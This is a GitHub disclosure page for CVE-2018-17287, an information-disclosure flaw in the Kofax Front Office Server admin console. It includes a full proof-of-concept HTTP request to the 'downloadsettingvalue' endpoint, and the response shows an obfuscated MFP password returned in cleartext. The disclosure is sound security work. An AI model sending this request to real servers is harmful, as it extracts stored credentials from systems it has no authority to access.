Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2018-17287-Information Disclosure-Kofax/
Disclosures/CVE-2018-17287-Information Disclosure-Kofax/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 

CVE-2018-17287-Information Disclosure

In Kofax Front Office Server Administration Console 4.1.1.11.0.5212, some fields (Ex. password fields) are obfuscated in the front-end, but the cleartext value can be exfiltrated by using the back-end "download" feature, as demonstrated by an mfp.password downloadsettingvalue operation.


Request:
GET /Kofax/KFS/Admin/SettingsService/settings/customization/downloadsettingvalue/mfp.ricoh.properties/mfp.password/ HTTP/1.1
Host: *****************
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: KFS_AUTH_ADMIN=e3129819-d807-48ec-8ae8-efdb76388c4e
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Type: application/xml
Server: Microsoft-IIS/8.5
Content-Disposition: attachment; filename=mfp.password.xml
Set-Cookie: fileDownload=true; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Frame-Options: SAMEORIGIN
Date: Wed, 23 May 2018 12:21:32 GMT
Connection: close
Content-Length: 5

ricoh